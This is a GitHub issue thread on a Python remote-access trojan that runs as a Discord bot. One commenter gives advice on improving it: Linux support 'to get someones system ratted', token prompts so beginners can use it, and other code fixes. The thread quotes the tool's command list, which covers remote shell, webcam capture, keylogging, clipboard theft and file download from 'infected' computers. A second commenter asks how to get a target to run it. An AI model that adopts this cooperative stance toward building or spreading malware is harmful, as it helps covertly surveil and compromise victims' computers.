search

Sp00p64 / DiscordRAT

Discord Remote Administration Tool fully written in Python3
420 stars 106 forks source link

you need to fix ALOT in this code #59

Open TotallyNotAHaxxer opened 2 years ago

TotallyNotAHaxxer commented 2 years ago

i think the tool has great potential, and can easily be used in many scenarios. however i looked at the code and there are ALOT of issues ill start out with the basics. . . importing . . why is everything being imported under each def?

 if message.content.startswith("!shell"):
            global status
            import time
            status = None
            import su
you do NOT need to do this, if some error appears that makes you import under each definition that means there is a BUG in the script causing that, imports at top level are good enough to import through the entire script, doing import functions all the time can cause errors within the working script itself.
commands

whats with the constant windows usage? im sure if someone wanted to use this on linux to rat someone on discord with a windows or linux system this would work, rats i know are rare for linux CVE's however, you can easily make this compatible with linux 

with mss() as sct:
                sct.shot(output=os.path.join(os.getenv('TEMP') + "\\monitor.png"))
            file = discord.File(os.path.join(os.getenv('TEMP') + "\\monitor.png"), filename="monitor.png")

like that right there can easily be changed to something like 

import sys 
from sys import platform 
with mss() as sct:
       if sys.platform == 'windows':
                                   sct.shot(output=os.path.join(os.getenv('TEMP') + "\\monitor.png"))
            file = discord.File(os.path.join(os.getenv('TEMP') + "\\monitor.png"), filename="monitor.png")
      else:
          sct.shot(output=os.path.join(os.getenv('TEMP') + "/monitor.png")) @ switching the code block to a / for linux instead of \\ for DOS based systems
            file = discord.File(os.path.join(os.getenv('TEMP') + "/monitor.png"), filename="monitor.png")

this is just a general idea for what you can do to get someones system ratted on linux

help menu i can get some people make it in the script but its best not to, in the case you need to switch up the menu make a new one etc just make a txt file and have other devs the ability to change it so change THIS 

helpmenu = 
Availaible commands are :
--> !message = Show a message box displaying your text / Syntax  = "!message example"
--> !shell = Execute a shell command /Syntax  = "!shell whoami"
--> !webcampic = Take a picture from the webcam
--> !windowstart = Start logging current user window (logging is shown in the bot activity)
--> !windowstop = Stop logging current user window 
--> !voice = Make a voice say outloud a custom sentence / Syntax = "!voice test"
--> !admincheck = Check if program has admin privileges
--> !sysinfo = Gives info about infected computer
--> !history = Get computer navigation history
--> !download = Download a file from infected computer
--> !upload = Upload file from website to computer / Syntax = "!upload file.png" (with attachment)
--> !cd = Changes directory
--> !write = Type your desired sentence on infected computer
--> !wallpaper = Change infected computer wallpaper / Syntax = "!wallpaper" (with attachment)
--> !clipboard = Retrieve infected computer clipboard content
--> !geolocate = Geolocate computer using latitude and longitude of the ip address with google map / Warning : Geolocating IP addresses is not very precise
--> !startkeylogger = Starts a keylogger / Warning : Likely to trigger AV 
--> !stopkeylogger = Stops keylogger
--> !dumpkeylogger = Dumps the keylog
--> !volumemax = Put volume at 100%
--> !volumezero = Put volume at 0%
--> !idletime = Get the idle time of user
--> !sing = Play chosen video in background (Only works with youtube links)
--> !stopsing = Stop video playing in background
--> !blockinput = Blocks user's keyboard and mouse / Warning : Admin rights are required
--> !unblockinput = Unblocks user's keyboard and mouse / Warning : Admin rights are required
--> !screenshot = Get the screenshot of the user's current screen
--> !exit = Exit program
--> !kill = Kill a session or all sessions except current one / Syntax = "!kill session-3" or "!kill all"

TO THIS in my script for discord hacking i use this to echo/print/r the token inputted you can use this as well to cat the banner, or even the helpmenu to prevent bugs or issues in your script upon compiling or running 

tok = open("help.txt", 'r')
    tok1 = tok.readlines()
    for line in tok1:
        print("[+] Help menu Option-> {}".format(line.strip()))

================================= USER FRIENDLY OPTIONS ======================================= in a rat script you want to make it user friendly especially for begginers, i noticed you have people change the code for their token?

token = '' #Enter your token here

despite it being obvious on how to do so kids who will most likely use this wont even know what it means by token there are a few ways to comprimise this strings


# string input 
A = str(input(" Enter you're discord token >>> "))
# int if its a intiger token 
A = int(input("Enter you're discord token >>> ")
# regular input 
A = input("Enter your discord token >>> ")

you can also change this with command line arguments like 

token = sys.argv[0]
if not token:
         print("[-] I need your discord token to run this tool")

this will make the script VERY user friendly

conclusion

this script has amazing potential but there are SO MUCH errors, bugs, issues, and code blocks that NEED to be fixed, im not going to write you more of a book the amount of issues in this script and code are, again i think its a good idea however you REALLY need to fix the code blocks in there to where it will actually work, and will work smoother than less grindy and all chunked up

my name is ark angel call me Angel, i am a cyber weapons developer, as well as the leader of a hacking organization called bushido security where we believe in helping fellow developers while following bushido code EX honoring our countrym, I write in python3, python2, html, css, scss, js, rust, go, ruby, C, C++, C#, Perl, Bash, batch, SQL, and even one of my own based languages, i would be willing to help you out if you have any questions please do contact me on instagram or write me here my instagram is

-> bushido_security_re43p3r

fabianlanza commented 2 years ago

Nice, I got one question about this RAT, how does it is used, I mean yeah I run it and everything bot works but how I make someone else the target? Do I need to give the code or .exe of the bot to the target?